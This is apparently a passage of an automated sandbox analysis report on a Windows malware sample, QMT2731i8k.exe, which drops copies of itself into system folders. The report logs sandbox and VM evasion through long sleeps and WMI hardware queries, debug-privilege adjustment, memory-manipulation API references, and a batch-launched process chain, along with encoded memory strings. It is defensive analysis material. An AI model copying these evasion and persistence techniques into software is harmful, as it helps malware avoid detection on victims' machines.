Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe TID: 7996	Thread sleep time: -590678s >= -30000s	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe TID: 7996	Thread sleep time: -590359s >= -30000s	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe TID: 7996	Thread sleep time: -590098s >= -30000s	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe TID: 7996	Thread sleep time: -589593s >= -30000s	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe TID: 7996	Thread sleep time: -589312s >= -30000s	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe TID: 7996	Thread sleep time: -588890s >= -30000s	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe TID: 7996	Thread sleep time: -588625s >= -30000s	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe TID: 7996	Thread sleep time: -587905s >= -30000s	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe TID: 7996	Thread sleep time: -587734s >= -30000s	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe TID: 7996	Thread sleep time: -587406s >= -30000s	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe TID: 7996	Thread sleep time: -587047s >= -30000s	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe TID: 7996	Thread sleep time: -586859s >= -30000s	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe TID: 7996	Thread sleep time: -586631s >= -30000s	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe TID: 7996	Thread sleep time: -586515s >= -30000s	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe TID: 7996	Thread sleep time: -586354s >= -30000s	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe TID: 7996	Thread sleep time: -586212s >= -30000s	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe TID: 7996	Thread sleep time: -586093s >= -30000s	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe TID: 7996	Thread sleep time: -585969s >= -30000s	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe TID: 7996	Thread sleep time: -585838s >= -30000s	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe TID: 7996	Thread sleep time: -585673s >= -30000s	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe TID: 7996	Thread sleep time: -585307s >= -30000s	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe TID: 7996	Thread sleep time: -585093s >= -30000s	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe TID: 7996	Thread sleep time: -584982s >= -30000s	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe TID: 7996	Thread sleep time: -584875s >= -30000s	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe TID: 7996	Thread sleep time: -584765s >= -30000s	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe TID: 7996	Thread sleep time: -584650s >= -30000s	Jump to behavior
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe TID: 8164	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\QMT2731i8k.exe TID: 2736	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe TID: 7556	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\QMT2731i8k.exe TID: 7668	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe TID: 7284	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\QMT2731i8k.exe TID: 7844	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe TID: 6104	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe TID: 5576	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe TID: 1260	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\QMT2731i8k.exe TID: 396	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\QMT2731i8k.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\QMT2731i8k.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\QMT2731i8k.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\QMT2731i8k.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\QMT2731i8k.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\QMT2731i8k.exe

Code function: 0_2_00007FFD9B889518 GetSystemInfo,

0_2_00007FFD9B889518

Source: C:\Users\user\Desktop\QMT2731i8k.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 599843	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 3600000	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 598920	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 598422	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 598140	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 597922	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 597796	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 597343	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 597093	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 596312	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 596000	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 595810	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 595672	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 595453	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 595140	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 594906	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 594390	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 593500	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 593250	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 592843	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 592406	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 592062	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 591625	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 590678	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 590359	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 590098	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 589593	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 589312	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 588890	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 588625	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 587905	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 587734	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 587406	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 587047	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 586859	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 586631	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 586515	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 586354	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 586212	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 586093	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 585969	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 585838	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 585673	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 585307	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 585093	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 584982	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 584875	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 584765	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 584650	Jump to behavior
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\QMT2731i8k.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: QMT2731i8k.exe, 00000000.00000002.1677840960.0000000002661000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: iG7RQzr1OWsk4LOvARkQVEDNVGA9xQPISyQ9hHZ9e9nfBI91J9s4JueeCt5JysE7GkRG4PN31kwWbiMNHJzxiU8iTv6xMPLv5pYa0364vzDj7IDehsCp2QZwmtwISZrlYBavJvWNM5BsRYkKscQdNf2pPmyHGxlWIbK6sRUwVyc7OqeNIma0JNY3Ivfg6OHZUpk0OnbaHdIYD5ajIl8dXvM5DRy7wxzGrDmiGn9fK9tpE9zMU6YVQnBjdox6zeoToBrAS2cemdSYBg0DblnzZe0EBDEb0CqqUZBCSz3bd4twUnh6yteN0y3JLm9PxBnjxmDlfyumrLVfvDtXgHnGhczff21p0oncQJ9sk5b992gpcYXI3lspXhCUwhFm7FwDi3OmDAxlqnHp6KDHetwO57FtHp5DzzC3FcHjJvE2yH9tZWYme8INShHkyfeYEtv0kNjdDd7so3ax8VTuQTi0qykhVhvoRpyEWIJLw4iABajZHTlcMuHuK4KvmCIgrTb8FVbzLI7VvizQPLZB5ScgiD3b8XiuwCSs8kUv1wRDwv9mE4fbmGlZ14aCc91yjNjsPHRp0oJIBYtwDQXE1HIqb30EJST25cejMQX7m0k86cXdKo8Lmw6cE3RVQNfiURNi3Kjw3ZbBgJt8fX3fTIPIgCeT8BqZUCooOzjAELSMV555JT03UAOLCFB1pQx1tCqefEtqy2aH0CxlGjJpLxFUxcmJxrVyXadSObZFjJEbjGVARauFGIq66VqDck3GhltZieWpKEFBsnuqGm1W7PrPuhW2uVm9Q838X6bxDF5BCoNTl97zsgIS4epBIe4ybGvtuwTKLET2TpMFTCRvYwRtzlDP
Source: qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.0000000012AE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
Source: w32tm.exe, 00000007.00000002.1728833500.0000020D8CA07000.00000004.00000020.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4107331003.0000000000AC3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: QMT2731i8k.exe, 00000000.00000002.1677840960.0000000002661000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: iG7RQzr1OWsk4LOvARkQVEDNVGA9xQPISyQ9hHZ9e9nfBI91J9s4JueeCt5JysE7GkRG4PN31kwWbiMNHJzxiU8iTv6xMPLv5pYa0364vzDj7IDehsCp2QZwmtwISZrlYBavJvWNM5BsRYkKscQdNf2pPmyHGxlWIbK6sRUwVyc7OqeNIma0JNY3Ivfg6OHZUpk0OnbaHdIYD5ajIl8dXvM5DRy7wxzGrDmiGn9fK9tpE9zMU6YVQnBjdox6zeoToBrAS2cemdSYBg0DblnzZe0EBDEb0CqqUZBCSz3bd4twUnh6yteN0y3JLm9PxBnjxmDlfyumrLVfvDtXgHnGhczff21p0oncQJ9sk5b992gpcYXI3lspXhCUwhFm7FwDi3OmDAxlqnHp6KDHetwO57FtHp5DzzC3FcHjJvE2yH9tZWYme8INShHkyfeYEtv0kNjdDd7so3ax8VTuQTi0qykhVhvoRpyEWIJLw4iABajZHTlcMuHuK4KvmCIgrTb8FVbzLI7VvizQPLZB5ScgiD3b8XiuwCSs8kUv1wRDwv9mE4fbmGlZ14aCc91yjNjsPHRp0oJIBYtwDQXE1HIqb30EJST25cejMQX7m0k86cXdKo8Lmw6cE3RVQNfiURNi3Kjw3ZbBgJt8fX3fTIPIgCeT8BqZUCooOzjAELSMV555JT03UAOLCFB1pQx1tCqefEtqy2aH0CxlGjJpLxFUxcmJxrVyXadSObZFjJEbjGVARauFGIq66VqDck3GhltZieWpKEFBsnuqGm1W7PrPuhW2uVm9Q838X6bxDF5BCoNTl97zsgIS4epBIe4ybGvtuwTKLET2TpMFTCRvYwRtzlD0o
Source: 1f2b6125644fa30.0.dr	Binary or memory string: iG7RQzr1OWsk4LOvARkQVEDNVGA9xQPISyQ9hHZ9e9nfBI91J9s4JueeCt5JysE7GkRG4PN31kwWbiMNHJzxiU8iTv6xMPLv5pYa0364vzDj7IDehsCp2QZwmtwISZrlYBavJvWNM5BsRYkKscQdNf2pPmyHGxlWIbK6sRUwVyc7OqeNIma0JNY3Ivfg6OHZUpk0OnbaHdIYD5ajIl8dXvM5DRy7wxzGrDmiGn9fK9tpE9zMU6YVQnBjdox6zeoToBrAS2cemdSYBg0DblnzZe0EBDEb0CqqUZBCSz3bd4twUnh6yteN0y3JLm9PxBnjxmDlfyumrLVfvDtXgHnGhczff21p0oncQJ9sk5b992gpcYXI3lspXhCUwhFm7FwDi3OmDAxlqnHp6KDHetwO57FtHp5DzzC3FcHjJvE2yH9tZWYme8INShHkyfeYEtv0kNjdDd7so3ax8VTuQTi0qykhVhvoRpyEWIJLw4iABajZHTlcMuHuK4KvmCIgrTb8FVbzLI7VvizQPLZB5ScgiD3b8XiuwCSs8kUv1wRDwv9mE4fbmGlZ14aCc91yjNjsPHRp0oJIBYtwDQXE1HIqb30EJST25cejMQX7m0k86cXdKo8Lmw6cE3RVQNfiURNi3Kjw3ZbBgJt8fX3fTIPIgCeT8BqZUCooOzjAELSMV555JT03UAOLCFB1pQx1tCqefEtqy2aH0CxlGjJpLxFUxcmJxrVyXadSObZFjJEbjGVARauFGIq66VqDck3GhltZieWpKEFBsnuqGm1W7PrPuhW2uVm9Q838X6bxDF5BCoNTl97zsgIS4epBIe4ybGvtuwTKLET2TpMFTCRvYwRtzlD

Source: C:\Users\user\Desktop\QMT2731i8k.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\QMT2731i8k.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 0.2.QMT2731i8k.exe.2480000.5.raw.unpack, Class73.cs	Reference to suspicious API methods: A86.VirtualProtect(intPtr, (UIntPtr)(ulong)num, A86.OkN.flag_2, out var okN_)
Source: 0.2.QMT2731i8k.exe.2480000.5.raw.unpack, Class74.cs	Reference to suspicious API methods: A86.GetProcAddress(A86.GetModuleHandle(string_0), string_1)
Source: 0.2.QMT2731i8k.exe.2480000.5.raw.unpack, AFA.cs	Reference to suspicious API methods: A86.VirtualAlloc(intPtr3, (IntPtr)uint_0, A86.U14.flag_0 \| A86.U14.flag_1, A86.OkN.flag_2)

Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w5dfstyj\w5dfstyj.cmdline"	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\bsHDGyqA5r.bat"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES88DB.tmp" "c:\Windows\System32\CSCD6A0005F729947378317C8DDF47B6938.TMP"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe "C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe"	Jump to behavior

Source: qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4109389958.00000000029D5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4109389958.00000000029D5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager@

Source: C:\Users\user\Desktop\QMT2731i8k.exe	Queries volume information: C:\Users\user\Desktop\QMT2731i8k.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
